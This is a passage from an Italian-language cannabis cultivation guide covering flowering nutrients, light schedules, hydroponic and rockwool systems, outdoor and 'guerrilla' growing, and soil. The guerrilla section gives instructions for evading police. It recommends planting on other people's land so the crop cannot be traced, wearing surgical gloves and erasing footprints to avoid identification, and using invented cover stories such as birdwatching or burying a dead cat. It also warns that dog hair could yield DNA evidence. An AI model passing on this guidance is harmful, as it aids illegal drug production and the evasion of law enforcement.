miglioramento domestico consiste nel servirsi di soluzioni a base di elementi in tracce 
ricche di ferro, quelle usate per integrare le carenze dei prati, che possono essere 
adattate alla coltivazione dell'erba. I prezzi per questi fertilizzanti in serie sono 
di gran lunga pi convenienti di quelli specifici per colture idroponiche venduti in 
negozi di giardinaggio, e sembra che funzionino egregiamente.

SOLUZIONE IDROPONICA PER LA FIORITURA, per gallone: 
-	1 cucchiaino di nutrimento per piante high P, come il 15-30-15, o il 5-50-17, ecc... 
-	1/ 2 cucchiaino di sale inglese 
-	1 cucchiaino di nutrimento per piante arricchito con ossigeno (facoltativo) 
-	1 cucchiaino di sostanza con elementi in tracce  

Non posso evidenziare abbastanza che durante la FASE DI FIORITURA, i periodi di buio non 
devono essere violati da luce normale. Ritarda lo sviluppo del fiore per via degli ormoni 
contenuti nella pianta che reagiscono alla luce. Se devi lavorare sulle piante in questo 
periodo, lascia filtrare solo una luce dell'intensit di una luna molto pallida e per meno 
di 5 minuti. Pota le piante il meno possibile durante l'intera fase di fioritura.
Si pu usare una luce verde per lavorare nel giardino durante il periodo di buio senza 
reazioni negative da parte delle piante. Queste sono vendute come luci di sicurezza per 
serre, ma qualsiasi lampadina verde dovrebbe essere OK. E' preferibile non visitare il 
giardino nelle ore di buio. Personalmente, preferisco lasciare illuminato il mio giardino 
dalle 7 di sera alle 7 del mattino, cos posso fare una visita al giardino di notte dopo 
il lavoro e la mattina prima di andare a lavorare, e per tutto il resto della giornata, 
quando sono troppo occupato per preoccuparmene, lui sta l indisturbato al buio, continuando 
a fiorire...
Le piante in fiore non dovrebbero essere innaffiate spesso perch questo faciliter la 
formazione di muffa e putredine. Al chiuso mantieni bassi i livelli di umidit durante la 
fioritura, perch questo  il periodo pi delicato per le piante. 
Una prima fioritura si nota 1-2 settimane dopo l'ultima esposizione alla luce per 12 ore al 
giorno. Cerca 2 peli bianchi che emergono da una piccola area bulbosa per ogni internodo. 
Questo  il modo pi facile per verificare subito se la pianta  femmina. Non puoi 
distinguere un maschio da un femmina dall'altezza, o dalla rigogliosit delle foglie. 
A 3-6 settimane dall'ultima esposizione alla luce, le tue piante saranno coperte di questi 
pistilli bianchi che spuntano da ogni picciolo sulla pianta. Sar letteralmente ricoperta 
di questi. Questi sono i fiori maturi, che continuano a crescere e a coprire la pianta. 
Alcune piante faranno questo indefinitamente fino a quando la luce sar nuovamente tornata. 
A questo punto sei pronto per vedere i fiori esistenti divenire maturi (senti che la pianta 
ha abbastanza fiori), riaccendi le luci per 8-10 ore. Ora la pianta comincer a maturare 
rapidamente, e dovrebbe essere pronta per il raccolto in 2-3 settimane. L'alternativa  
permettere alla pianta di maturare con qualsiasi durata naturale del giorno disponibile 
all'aperto, o tenere le piante ad un regime costante di 12 ore per l'intero processo di 
fioritura, che pu aumentare la produzione, ma impiegare pi tempo. 
Le piante possono fiorire all'aperto nell'ultima fase, anche se i giorni sono ancora troppo 
lunghi per una normale fioritura. Una volta che la pianta ha raggiunto quasi il picco dello 
sviluppo floreale,  anche troppo avanti per regredire rapidamente allo stadio della crescita 
vegetativa, e la fioritura definitiva si verificher malgrado tutto. Questo liberer spazio 
prezioso al coperto in poco tempo, per il prossimo lotto di cloni da fiorire. 
Osserva quando i peli bianchi diventano rossi, arancioni o marroni, e i finti baccelli 
(hai scartato bene i maschi?) si ingrossano di resina. Quando la maggior parte dei pistilli 
ha cambiato colore (circa l'80%), i fiori sono maturi per il raccolto. 
Non toccare quelle gemme! Tocca solo le grandi foglie a ventaglio se vuoi ispezionare le 
gemme, altrimenti il THC rester sulle tue dita, riducendo cos la produzione complessiva.



COLTURE IDROPONICHE 

La maggior parte dei coltivatori riferisce che un sistema idroponico svilupper le piante 
pi velocemente rispetto ad un sistema tradizionale a base di terra, dando alle piante le 
stesse caratteristiche genetiche e condizioni ambientali. Questo pu essere dovuto ad una 
maggiore attenzione e controllo dei nutrimenti, e ad un pi ricco apporto di ossigeno. Le 
piante possono respirare con pi facilit, e per questo, impiegano meno tempo per crescere. 
Un rapporto indica come le piante che hanno cominciato nella terra, maturate dopo le piante 
idroponiche, partono con due settimane di ritardo! 
Una rapida crescita garantisce una maturazione anticipata e un periodo di crescita totale 
per il raccolto pi ristretto. Inoltre, con misture di terra, la crescita della pianta tende
 a rallentare quando le piante iniziano a fissarsi alla terra con le radici. Le colture 
idroponiche assicurano inoltre, una rapida crescita senza interruzioni per un trapianto in
 blocco ed elimina il lavoro e i materiali del ripiantare nel vaso qualora la lana di roccia 
fosse gi usata.  (Molto consigliato!) 
I sistemi idroponici di gran lunga pi facili da usare sono lo stoppino e i sistemi a 
serbatoio. Questi sono indicati come Metodi Idroponici Passivi, perch non richiedono alcun 
sistema di distribuzione dell'acqua su una scala attiva (pompa, drenaggio, misuratore di 
flusso e corso). Questi sistemi si basano sul fatto che tu puoi portare l'acqua nei punti 
che preferisci se l'ambiente e le condizioni primarie sono corretti. 
Il sistema dello stoppino  pi complesso del sistema del serbatoio, dal momento che gli 
stoppini devono essere tagliati e sistemati nei vasi, devono essere scavati nei vasi buchi 
corretti, e bisogna ricavare dello spazio per sistemare le piante sopra il serbatoio dell'
acqua. Questo pu essere pi semplice con due secchi, uno sistemato dentro all'altro, o una 
piscina in gomma per bambini con mattoni all'interno su cui sistemare i vasi, elevandoli 
oltre la soluzione nutriente. 
Trovo che l'installazione dello stoppino sia pi funzionale del sistema del serbatoio. L'
installazione iniziale  laboriosa con gli stoppini, e le piante si sviluppano maggiormente 
in altezza nella stanza, occupando prezioso spazio verticale. La base del vaso non pu 
restare molto stabile in confronto ad un sistema a serbatoio, ed una pianta rovesciata a 
terra non sar mai uguale ad una pianta intatta, a causa dello stress e dello shock del 
recupero. 
Il sistema del serbatoio ha bisogno solo di un buon ambiente adattato al compito, ed una 
pentola in cui mettere un vasetto. Se si usano strisce di lana di roccia, mezza striscia 
di lana di roccia da 30 centimetri sta perfettamente in una vaschetta tipo una lettiera per 
gatti. Le radici si sviluppano per via orizzontale (fortunatamente) ed hanno a disposizione
 molto spazio per crescere. Le piante cresciute in questa maniera sono molto robuste perch 
ricevono molto ossigeno alle radici. Le piante cresciute con il sistema idroponico a 
serbatoio si sviluppano con un ritmo analogo a quello del metodo degli stoppini o di altri
 metodi idroponici attivi, con molto meno impegno richiesto, dal momento che  di gran lunga 
il pi semplice dei metodi idroponici. Le piante possono essere annaffiate e nutrite soltanto 
con una soluzione che fluisce nel serbatoio ogni pochi giorni. Le vaschette occupano veramente
 poco spazio verticale e sono facili da maneggiare e da spostare. 
In un metodo idroponico tradizionale, le vaschette sono riempite con una mistura di 
lava/vermiculite in un rapporto di 4 a 1. Si aggiunge 'Dolite Lime', un cucchiaio per 
gallone (circa 4 litri). Questo sistema fermer e accumuler acqua, anche se  dotato 
di un eccellente drenaggio ed anche della capacit di immagazzinare aria. E comunque, non 
 molto riutilizzabile, come anche  difficile da riprendere e sterilizzare dopo il raccolto. 
Usa lava di piccole dimensioni, quelle di un pisello di 7,5/20 cm per intenderci, e lava via 
la polvere, pi e pi volte, fino a quando se ne  quasi tutta andata. Bagna la vermiculite 
(asciutta  pericolosa, indossa una maschera) e mescolala nelle vaschette. Le vaschette 
quadrate sono pi capienti di quelle rotonde. La vermiculite si depositer sul fondo dopo 
ripetuti innaffiamenti dall'alto, in modo che solo l'acqua proveniente dall'alto di quando 
in quando laver qualche deposito di minerali, perci aggiungi pi vermiculite in cima che 
sul fondo. Fai dei buchi sul fondo delle vaschette, ed aggiungi acqua al vaso. Si fermer 
alle radici e le piante avranno tutto il necessario per fiorire. 
Il serbatoio viene riempito con 4-8 cm di acqua e sistemato in modo che l'acqua si ritiri 
tra un innaffiamento e l'altro. Quando possibile, usa meno soluzione e pi spesso acqua, 
per girare pi ossigeno alle radici nel minor tempo possibile. Se parti per le vacanze, 
riempi semplicemente i serbatoi fino all'orlo, e le piante avranno un apporto d'acqua per 
almeno 2 settimane. 
Un mezzo idroponico veramente eccezionale  la schiuma floreale Oasi. Crea molti buchi in 
essa per aprirla un po' e comincia all'interno la coltivazione delle piante/cloni, passando 
dal blocco di schiuma alla lana di roccia in seguito per gli stadi di crescita pi avanzati. 
Molti preferiscono la schiuma floreale, siccome  inerte, e non aggiunge alcun fattore PH. 
Purtroppo  costosa, e tende a sbriciolarsi facilmente. Non sono inoltre sicuro se sia molto 
riutilizzabile, ma sembra che sia un prodotto popolare nei negozi di giardinaggio. 
Si pu piantare con pi facilit con mezzi idroponici che richiedono poca manutenzione come 
la lana di roccia. I pezzi di lana di roccia possono essere riutilizzati in tempi successivi, 
e sono preconfezionati per usarsi in colture idroponiche. Alcuni vantaggi della lana di 
roccia sono costituiti dal fatto che  impossibile eliminare l'acqua e non c' bisogno di 
trapianto. Sistema soltanto la scatola della pianta in cima ad una pi grande di lana di 
roccia e goditi il tuo tempo libero extra.
Alcuni si trovano meglio a risparmiare denaro non acquistando lana di roccia ma impiegando 
il tempo a piantare in terra o in sistemi idroponici come la miscela vermiculite/lava. La 
perlite va bene, visto che c' molta luce. La perlite pu essere usata al posto o in aggiunta 
alla lava, che deve essere risciacquata ed  molto pi pesante. 
Ma la lana di roccia ha molti vantaggi che non sono apprezzati fino a quando si  costretti 
ad impiegare diverse ore a trapiantare in vasi pi grandi; pensaci due volte. Non  molto 
costosa, ed  riutilizzabile. E' pi stabile della schiuma floreale, che si schiaccia e si 
sbriciola facilmente. La lana di roccia trattiene l'acqua 10 volte di pi della terra, 
inoltre  impossibile eliminare l'acqua, perch trattiene sempre un'alta percentuale di 
aria. Soluzione migliore di tutte, non c' bisogno di alcun travaso; sistema solamente 
una scatola di partenza in un cubo di lana di roccia destinata alla crescita, e quando 
la pianta diventa molto grande, sistema questa scatola su un pannello di lana di roccia. 
Dal momento che la lana di roccia  facilmente riutilizzabile pi e pi volte, il costo 
viene diviso per 3 o 4 raccolti, e finisce per costare non pi della vermiculite e della 
lava, che sono molto pi difficili da recuperare per un uso intensivo, da sterilizzare e 
riutilizzare (ritravasare) in confronto alla lana di roccia. La vermiculite  anche molto 
pericolosa quando asciutta, e finisce per disperdersi in coltri e nell'aria quando la 
tocchi (anche bagnata), dal momento che si asciuga sulle dita e diviene volatile. Per 
questa ragione non  consigliabile la vermiculite al coperto.
Gli svantaggi della lana di roccia sono relativamente pochi. E' a PH alcalino, cos devi 
usare qualche cosa nella soluzione nutriente per renderlo acido (5.5) in modo tale da portare 
i valori della lana di roccia dal 7.7 al 6.5 (l'aceto funziona bene.) E' irritante per la 
pelle quando  asciutta, ma non  un problema quando  bagnata. 
Per pretrattare la lana di roccia per piantare, immergila in una soluzione di emulsioni di 
pesce, minerali in tracce ed acido fosforico (PH basso) per 24 ore, quindi risciacqua. 
Questo diminuisce la richiesta di PH che si verifica in seguito, quando tamponi il PH della 
lana di roccia per renderlo abbastanza neutro. 
Le colture idroponiche dovrebbero essere impiegate al coperto o in serre per velocizzare 
la crescita delle piante, per ottenere cos pi gemme in meno tempo. Le colture idroponiche 
ti permettono di annaffiare le piante giornalmente, e questo accelerer la crescita. La 
differenza principale tra una coltura idroponica e una in terra  che terreno idroponico o 
"ambiente" viene impiegato per trattenere l'umidit, ma smaltisce bene, e cos non c' 
nessun problema di sovrainnaffiamento connesso ad una irrigazione continua. Inoltre, le 
piante cresciute idroponicamente non ricavano i nutrimenti dal suolo, ma dalla soluzione 
usata per innaffiare le piante. Le colture idroponiche riducono la preoccupazione di 
incrementare i minerali nel suolo, e la carenza di ossigeno che pu soffocare le radici, 
cos la lisciviazione non  normalmente con le colture idroponiche. 
Le colture idroponiche permettono di usare contenitori pi piccoli per piante della stessa 
dimensione, in confronto alla crescita in terra. Un vaso da 3 litri pu facilmente essere 
usato per portare una pianta cresciuta idroponicamente alla maturazione. Questo sarebbe 
difficile da realizzare nella terra, dal momento che i nutrimenti vengono subito consumati 
e le radici vengono private dell'ossigeno quando fissano a terra le radici. Questo problema 
non sembra verificarsi quasi pi rapidamente per le piante idroponiche, dal momento che le 
radici possono ancora assorbire nutrimenti da una alimentazione a soluzione costante, e 
l'ambiente trasmette ossigeno molto pi prontamente quando le radici si fissano nel piccolo 
contenitore. 
Il nutrimento delle piante deve essere somministrato con molti innaffiamenti, e garantisce 
al giardiniere di controllare scrupolosamente quali nutrimenti hanno a disposizione le piante 
nei vari stadi della crescita della pianta. L'innaffiamento pu essere automatizzato per certi 
aspetti con un semplice ed economico apparato di innaffiamento a gocce, in modo da 
avvantaggiarsene quando possibile. 
Le colture idroponiche affretteranno il tempo di crescita, cos ci vorr meno tempo tra 
la semina e il raccolto. Ha senso usare semplici tecniche idroponiche passive quando 
possibile. Le colture idroponiche non sono certo indicate per la coltivazione all'esterno, 
a meno che non si possieda una serra. 
ATTENZIONE:  necessario badare con molta cura alle piante per assicurarsi che non perdano 
molta acqua e si secchino durante la fase della crescita idroponica, altrimenti le radici 
saranno compromesse. Se non sei in grado di occuparti del giardino ogni giorno, accertati 
che le vaschette siano riempite a sufficienza fino al tuo prossimo ritorno, oppure potresti 
perdere con estrema facilit il tuo raccolto.
I metodi idroponici (attivi) pi tradizionali non vengono trattati qui. Non vedo un qualche 
punto nella loro messa in opera pi difficile del necessario. E' indispensabile cambiare la 
soluzione ogni mese se la fai circolare tramite un pompa, ma il sistema del serbatoio elimina 
questo problema. Risciacqua soltanto il recipiente una volta al mese o gi di l per prevenire 
la formazione di sali annaffiando dall'alto della vaschetta o cubo di lana di roccia con 
acqua pura. Cambia i nutrimenti della pianta spesso per evitare carenze nutritive nelle piante.
Consiglio di usare 2 diversi nutrimenti per piante per ciascuna fase della crescita, o 4 
nutrimenti in totale, per ridurre i casi di carenza di una qualche sostanza. 
Cambia la soluzione pi spesso se osservi che il PH cala rapidamente (troppo acido). A 
causa dello scambio dei cationi, la soluzione tender a diventare troppo acida col tempo, 
e questo causer una indisponibilit di nutrimenti alle piante. Controlla il PH dell'ambiente 
di crescita ogni volta in cui annaffi per accertarti che non si verifichi alcuna perdita di 
PH. 
Con elevate concentrazioni di umidit nell'ambiente idroponico  probabile la formazione di 
alghe all'interno dei vasetti. Le alghe trasformeranno il pannello di lana di roccia di un 
colore grigio scuro. Per prevenire questo, stendi una pellicola plastificata sui bordi 
superiori del pannello di lana di roccia, con dei buchi aperti per farci sporgere all'esterno 
di essa le piante. E' facile tagliare un pannello impacchettato di lana di roccia in due 
pezzi, quindi taglia le estremit della plastica che sporgono da ogni pezzo. Ora hai due pezzi 
di lastra, ciascuno rivestito di plastica eccetto le estremit. Quindi incidi 2 o 3 buchi di 
10 cm quadrati in cima per metterci sopra i cubi, e sistema ciascun pezzo in una vaschetta 
pulita. Ora sei in grado di trattare la lana di roccia come descritto sopra nel capitolo 
riguardante l'anticipazione della semina. 
Se coltivi in vasi, vaschette, uno strato di ghiaia sulla cima del vaso pu aiutare a ridurre 
la formazione di alghe, dal momento che assorbe l'acqua molto rapidamente. Le alghe sono 
soltanto fastidiose e brutte da vedere; non arrecheranno alcun danno alle piante.


RICICLAGGIO 

Serviti di vasi ricavati da contenitori pi o meno quadrati del tipo dei brick d'acqua in 
plastica, ecc.... Pi piante staranno in meno spazio ed avranno un'area maggiore per mettere
 radici se vengono impiegati contenitori quadrati. Questo fa del tuo giardino un centro di 
riciclaggio, e ti permette di risparmiare montagne di soldi. 
I bottiglioni di coca da 2 litri vanno bene, ma non sono quadrati. 13 di questi staranno 
giusti in una vaschetta delle dimensioni di una lettiera per gatti, e porteranno una pianta 
da un metro alla maturazione per via idroponica. Se puoi disporre di 4 vaschette in un 
ripostiglio, potrai coltivare 52 piante come questa per via vegetativa. Distanziale per la 
fioritura. 
Vecchi secchi, contenitori di plastica da 10-20 litri (industrie alimentari e di vernici, 
prova a rovistare tra i rifiuti di un imbianchino o di un ristorante), secchi di vernice in 
cartone, vecchi bidoni dell'immondizia in plastica di ogni misura e sacchi della spazzatura 
sono tutti usati con successo dai coltivatori di maria. 
Non usare i cartoni del latte e del succo di frutta per le colture idroponiche a serbatoio, 
dal momento che sono difficili da sterilizzare, ed introducono colonie di funghi nelle tue 
vaschette a serbatoio. Materiali inerti, come la plastica, sono la cosa migliore. 
Assicurati di sterilizzare tutti i contenitori prima di ogni travaso con una soluzione di 
candeggina al cloro con 2 cucchiai di candeggina per circa 4 litri d'acqua. Lascia il 
contenitore e il sistema, tipo la lana di roccia, ammollo per diverse ore nella soluzione 
prima di risciacquarli completamente.


COLTIVARE FUORI 

Coltivare all'aperto  la cosa migliore. L'erba cresciuta all'aperto  di gran lunga pi 
forte, dal momento che riceve pi luce, ed  naturalmente pi robusta. Non c' problema di 
mancanza di luce. Nessun periodo di buio che ti costringa a restar fuori dal tuo luogo di 
coltivazione. Nessuna bolletta della luce. La luce solare tende a raggiungere pi parti della 
pianta, se la crescita si verifica sotto un'esposizione diretta dei raggi. A differenza della 
crescita al coperto, le parti basse della pianta saranno sviluppate quasi come la cima. 
All'aperto, fuori da una serra, ci sono molti fattori che possono distruggere il tuo raccolto. 
Il cervo cercher di mangiarle. Scoiattoli ed altri roditori lo stesso. Gli insetti vi si 
annideranno, ed il vento e la pioggia possono fare a pezzi le tue piccole gemme se sono 
esposte a violenti temporali. Per queste ragioni l'erba al coperto pu essere migliore di 
quella all'aperto, ma il miglior fumo che abbia mai assaggiato era quello cresciuto all'
aperto, quindi pensaci bene: niente batte il sole. 
Tira su un recinto e assicurati che stia in piedi. Fai visita alla tua piantagione almeno 
una volta ogni due settimane, e preferibilmente pi spesso se c' carenza d'acqua. 
E' una buona idea servirsi del terreno se non si possiede una serra, dal momento che le 
colture idroponiche sono meno affidabili fuori all'aria aperta, a causa soprattutto della 
forte evaporazione.
L'esposizione alla luce  un fattore molto importante nell'individuazione di un luogo per 
una serra o per un'area all'aperto. Un coltivatore domestico avr bisogno di sapere dove il 
sole splende per il periodo pi lungo; subentreranno anche la privacy ed altri fattori. Cerca 
di individuare un punto defilato che riceve luce piena d'inverno da met mattina a met 
pomeriggio, almeno dalle 10 del mattino alle 4 del pomeriggio, preferibilmente dalle 8 alle 
5. Ci sar veramente indispensabile se vivi a 30 gradi di latitudine nord (California) o 
superiori dal momento che d'inverno le giornate sono corte. Dal siccome la maggior parte dei 
giardinieri non vuole usare la serra nel cuore dell'inverno, puoi anche usare il sole 
invernale come un indice di buone esposizioni alla luce primaverile ed autunnale. Di solito 
il lato a sud di una collina riceve la maggior parte dei raggi solari. Inoltre, grandi aree 
aperte al sole sul lato nord della propriet avranno buone esposizioni a mezzogiorno. 
Esposizioni ad est e ad ovest possono risultare buone se hanno una piena insolazione di 
mattina/pomeriggio e anche a mezzogiorno. Alcuni libri riferiscono che le piante rispondono 
meglio ad un'esposizione solare esclusivamente mattutina, e non altrettanto ad un'esposizione 
esclusivamente pomeridiana, cos se devi scegliere tra le due, sappi che il sole di mattina  
meglio. 
Camuffa la tua serra come un capannone degli attrezzi, o struttura simile, usando soltanto 
un muro ed un tetto di plastica opaca bianca, PVC, Filon, o vetro, ed usa un materiale 
colorato alla stessa maniera per il resto del capanno, oppure dipingilo di bianco o d'argento,
 per farlo somigliare a metallo. Cerca di farlo sembrare come se fosse stato sempre l, 
circondato da piante ed alberi per nasconderlo da occhi indiscreti quando viene investito 
dalla luce del sole.
Filon (fibre di vetro increspate) o pannelli in PVC possono essere impiegati all'aperto 
per coprire le giovani piantine cresciute assieme nel giardino. Compra pannelli opachi da 
serra, e rendili opachi con una tintura bianca (ricavata dalla calce) o con una resina 
epossidica tinta di bianco o grigio e dipingili con uno strato sottile. Questo far filtrare 
pi luce solare del PVC o del Filon bianchi, ed in pi nasconde le piante. Rivestimenti in 
resina epossidica conservano il Filon per molte stagioni in pi di quanto altrimenti potrebbe 
durare. Permetter inoltre di far sembrare il capanno rivestito di metallo, se dipingi i 
pannelli bianchi di Filon con uno strato sottile di resina tinta di grigio chiaro. La pittura 
andr bene lo stesso, ma non potr proteggere pi di tanto. Curati di usare solo il minimo 
indispensabile, per ridurre il blocco dei raggi solari al minimo.
Scava un bel buco, non dipende dalla pianta poter penetrare l'argilla ed il pietrisco a meno 
che tu non sia sicuro della qualit dello strato superficiale del terreno dell'area. I prati 
erbosi avrebbero in linea di massima un buon suolo superficiale, ma il tuo prato dietro casa 
forse no. Solo questo pu fare la differenza tra una modesta pianta alta un metro e mezzo e 
un mostro alto tre metri al momento del raccolto. Coltivare nel terreno  sempre meglio che 
coltivare in vaso, dal momento che la pianta nel terreno non sar mai limitata nello sviluppo 
delle radici. Le piante cresciute nel terreno dovrebbero svilupparsi molto di pi, ma 
richiederanno molto pi spazio per ogni pianta, cos secondo i piani, non potrai spostarle 
una volta piantate!
Potresti voler tenere le piante all'aperto in vasi in modo da poterli spostare facilmente. 
Un bel buco consentir di introdurvi il vaso, in modo da ridurre l'altezza della pianta, 
qualora il livello del recinto fosse un problema. Molti coltivatori fanno notare che i vasi 
hanno salvato un raccolto che doveva essere spostato per alcuni inaspettati motivi (tecnici 
riparatori, stimatori, fuoco, ecc...). 
E' sempre meglio sistemare un tetto sopra le tue piante all'aperto. Quando ero un ragazzino, 
avevamo piante che crescevano sopra la staccionata di confine del cortile di casa. Abbiamo 
cominciato a costruire un tetto di serra per loro, ed un pulotto ci ha beccati a trasportare 
assi di legno, e pensando che le stessimo rubando (anche se non era cos) ha visto al di l 
recinto noi e le nostre amate piante. Siamo stati arrestati, perch le aveva scoperte. Se 
avesse visto un capanno coperto da un tetto invece, non ci sarebbe mai stato alcun problema.
 Morale della storia: costruisci il tetto prima che le piante sbuchino al di sopra del 
recinto! O falle crescere in modo che stiano al di sotto. Vivi e impara...
Quando coltivi lontano da casa, in un terreno incolto, l'acqua  il fattore pi determinante, 
dopo la sicurezza. L'acqua deve trovarsi nelle vicinanze, o vicino alla superficie del suolo, 
altrimenti la devi portare tu raccolta in recipienti. L'acqua  pesante e questo  un lavoro 
molto faticoso. Cerca di trovare un'area vicino ad una sorgente d'acqua se possibile, e 
procurati un secchio da tenere nelle vicinanze per portare l'acqua alla tua piantagione.
Un'idea bizzarra a questo riguardo  quella di trovare acqua di alta montagna, ad alta quota, 
e quindi incanalarla gi in un luogo pi basso nelle vicinanze. E' possibile creare pressione 
dell'acqua in un tubo in modo analogo, e incanalarla in un sistema di irrigazione a gocce che 
pompa l'acqua alle tue piante in continuazione. Prendi una tanica di benzina da 20 litri e 
forala con tanti piccoli buchi. fai uscire un tubo dall'apertura principale e assicuralo in 
qualche modo. Seppellisci il barattolo di metallo in un fiume o ruscello sotto culla, in modo
 che sia occultata e sommersa. Immergi la tanica in un corso d'acqua o rigagnolo sotto degli 
anfratti, in modo che sia nascosto e sommerso. Immergi il tubo che esce dalla tanica e fallo 
scorrere gi dall'altura fino al tuo appezzamento. Una piccola opera di ingegneria pu 
risparmiarti un bel po' di lavoro, e questa attrezzatura pu essere usata anno dopo anno.


COLTIVAZIONE DI GUERRIGLIA 

Coltivazione di guerriglia si riferisce alla coltivazione lontano dal proprio possedimento o 
in una remota ubicazione del possedimento dove la gente raramente si aggira. E' possibile 
trovare luoghi che per una ragione o per l'altra non sono facilmente accessibili o sono 
propriet private.
Cerca di coltivare lontano dalla tua propriet, su una propriet adiacente, in modo che se 
la tua piantagione viene scoperta, non sar facile risalire a te. Se non  nella tua 
propriet, nessuno ha testimoniato la tua presenza l, e non c' alcuna evidenza fisica d
ella tua presenza (impronte, impronte digitali, tracce, capelli, ecc...), allora  
virtualmente impossibile perseguirti per un qualsiasi reato, anche se gli sbirri pensano di 
sapere a chi appartiene.
Non confidare mai a nessuno cosa stai coltivando. La tua miglior difesa  quella di dire che 
stavi semplicemente passeggiando attraverso l'area, e che, notato qualcosa di strano, avevi 
deciso di dare un'occhiata, oppure porta con te una canna da pesca o un binocolo ed afferma 
di andare a pesca o di osservare gli uccelli.
Non rivelare mai a nessuno dove sono localizzate le piante. Non portare visitatori a vederle, 
a meno che sia tempo di raccolto, e le piante debbano essere colte lo stesso giorno o in 
quello successivo.
Accertati che le tue piante siano nascoste alla vista di chicchessia. Prendi una strada 
diversa per raggiungerle se non sono in una parte sicura della tua propriet, e copri le 
tracce per far credere che non sia una zona praticata. Lascia dei segnali lungo il sentiero, 
in modo che la gente sul sentiero principale tenda a perdere le indicazioni per l'area 
coltivata. Non parcheggiare sulla strada principale, trova sempre un posto per parcheggiare 
che non desti sospetto nella gente che passa per la strada. Tieni sempre una cassetta di 
"pronto intervento" nell'area se non coltivi vicino a casa. Ogni ragione  buona per trovarsi 
sul posto; cerca quindi di avere tutti gli oggetti necessari per rendere credibili le balle 
che eventualmente hai raccontato.
Rovi e rametti di edera sono perfetti per aprirsi dei varchi attraverso. L'edera velenosa deve 
essere lavata via prima che si manifesti una reazione allergica. Il Teknu  una soluzione di 
sapone speciale che neutralizzer l'edera velenosa prima che abbia tempo di reagire. Applica 
il Teknu immediatamente dopo il contatto e fatti una doccia entro 30 minuti.
Cerca di piantare sotto alberi, in vicinanza di cespugli e tieni solo alcune piante per ogni 
singolo punto. Aggiusta o guida le piante affinch si sviluppino ai lati o fai qualcosa per 
prevenire il classico "albero di Natale" che si nota nella maggior parte delle piante lasciate 
crescere senza guida. Fissando le cime al terreno consentirai ai rami delle piante di crescere 
verso il sole, ed aumenterai la produzione, con una stagione di crescita lunga abbastanza. Le 
piante possono crescere sotto gli alberi se il sole giunge con la giusta angolazione e 
illumina l'area per diverse ore al giorno. Le piante dovrebbero ricevere almeno 5 ore di luce 
solare diretta ogni giorno, ed altre 5 ore di luce indiretta. Cerca di procurarti scarpe che 
puoi usare sulle punte e cancella le impronte dei tuoi passi. Usa guanti chirurgici e cerca 
di non lasciare impronte digitali sui vasi e su altri oggetti che potrebbero farti 
identificare dalla pula... nel caso in cui la tua erba venga scoperta da passanti. 
Tira su un recinto, o le tamie, gli scoiattoli e i cervi mordicchieranno le tue piccoline 
fino a che non rimarr nulla. Una rete di filo verde ed una di nylon per polli vanno molto 
bene e possono essere avvolte attorno agli alberi per creare una barriera impenetrabile. 
Controllale sempre ed eventualmente riparale ad ogni visita che fai al giardino. Una barriera 
di lenze da pesca, una a 50 cm e l'altra ad un metro di altezza terr la maggior parte dei 
cervi lontano dal tuo raccolto. 
Cereali per tartarughe gopher sono disponibili per le aree come le montagne della California 
settentrionale, in cui topi di bosco e tartarughe gopher mangeranno il tuo raccolto se solo tu
 concederai loro un'opportunit di farlo. Il miglior recinto del mondo non terr i topi 
lontano dalle tue piante! Non usare sapone per tenere lontano i cervi perch attirer i 
topi!  (Il grasso del sapone  commestibile per loro.) Metti dei grani di veleno in una 
mangiatoia in cui solo i piccoli roditori possono entrare, in modo che gli uccelli e i 
cervi non possano mangiarli. Disponi il veleno in anticipo, prima di iniziare a piantare. 
I ratti devono mangiare i grani per diversi giorni prima che abbiano un qualche effetto su 
di loro. In definitiva, puoi trovare pi facile coltivare all'interno di una serra sul retro 
del tuo cortile piuttosto che cercare di trattenere i ratti dal mangiare la tua piantagione 
all'aperto.
Quando coltivi lontano da casa, in terreni incolti, l'acqua  il fattore pi determinante, 
dopo la sicurezza. La quantit che puoi coltivare  direttamente proporzionale all'acqua 
disponibile. Se devi raccogliere acqua, portala in un zaino nel caso tu sia stato visto lungo 
il tragitto che porta alle tue colture; farai sembrare di essere soltanto un escursionista, 
non un coltivatore. 
Trasportare le piante che hanno iniziato la crescita vegetativa nell'area di coltivazione  
un aspetto molto complesso della coltivazione all'aperto. Di solito, si comincia a coltivare 
le piante al coperto, o fuori nel giardino, quindi le si trasporta al luogo di coltivazione 
una volta che si sono saldamente formate. Pu essere d'aiuto individuare e separare per prima 
cosa i maschi dalle femmine cos non dovrai imbatterti nello sforzo di trasportare, piantare 
ed innaffiare le piante maschio. 
Un suggerimento  quello di usare cubetti di lana di roccia da 8 cm per cominciare al loro 
interno le pianticelle, quindi metterne 20 di loro in una vaschetta, coprirla con un'altra
 vaschetta e trasportarle sul posto dove vorrai coltivarle. I cubetti possono essere piantati 
direttamente nel terreno. Se vieni beccato nel tragitto che ti porta alla piantagione, la 
scusa di andare a seppellire un gatto morto potrebbe essere efficace: ben pochi ti chiederanno 
di guardare un cadavere in decomposizione! 
Sappiamo che un coltivatore all'aperto rinuncia ai semi. Fa molti sacrifici e gli piace 
praticare la clonazione, cos comincia con 200 cloni nel suo ripostiglio, quindi li 
trasporta all'aperto in scatoloni fino al posto dove devono essere coltivati. Nessun maschio, 
nessuna differenziazione, nessuna ripulitura dalle erbacce, nessun seme che germina, nessuna 
impurit genetica, nessun raccolto dedicato ai semi, nessun problema di trasporto, travaso e 
innaffiamento delle piante, devi solo curarti di raccogliere in un secondo tempo, nessun 
incubo di impollinazione, nessuna fatica sprecata!


CONCIMI

Ua il prodotto Super Soil, dato che questo  l'unico concime conosciuto sulla Costa Ovest 
certificato per dare i migliori risultati. Molte altre marche sono per lo pi prodotti per 
sottobosco ed hanno quindi pochissime sostanze nutritive, sono troppo umidi ecc... Aggiungi 
vermiculite, perlite o sabbia al Super Soil per incrementare il suo drenaggio ed aerazione.
I giardinieri organici usano un composto preparato da loro stessi da una mistura di pollo,
 mucca o altro concime ed avanzi di cibo, fogliame, erba tagliata, peli di cane ed altri 
rifiuti incluso il tuo piscio, che ha alti indici di azoto. Il pelo del cane non  consigliato 
per coltivatori di guerriglia che piantano lontano dalla loro propriet dove la polizia 
potrebbe trovarlo. Il test del DNA potrebbe provare che si tratta del tuo cane!
Usa cristalli d'acqua P4 nel concime per dare alle piante un minimo di riserva d'acqua per 
alcuni giorni. Questa sostanza si gonfia in presenza dell'acqua e la trattiene come una 
spugna, in modo che radici avranno una riserva se una dura siccit rende necessari 
innaffiamenti costanti. Vacci veramente piano con questa roba, in quanto tende a sedimentarsi 
sul fondo del vaso e a soffocare le radici pi profonde (le radici giovani appena spuntate) 
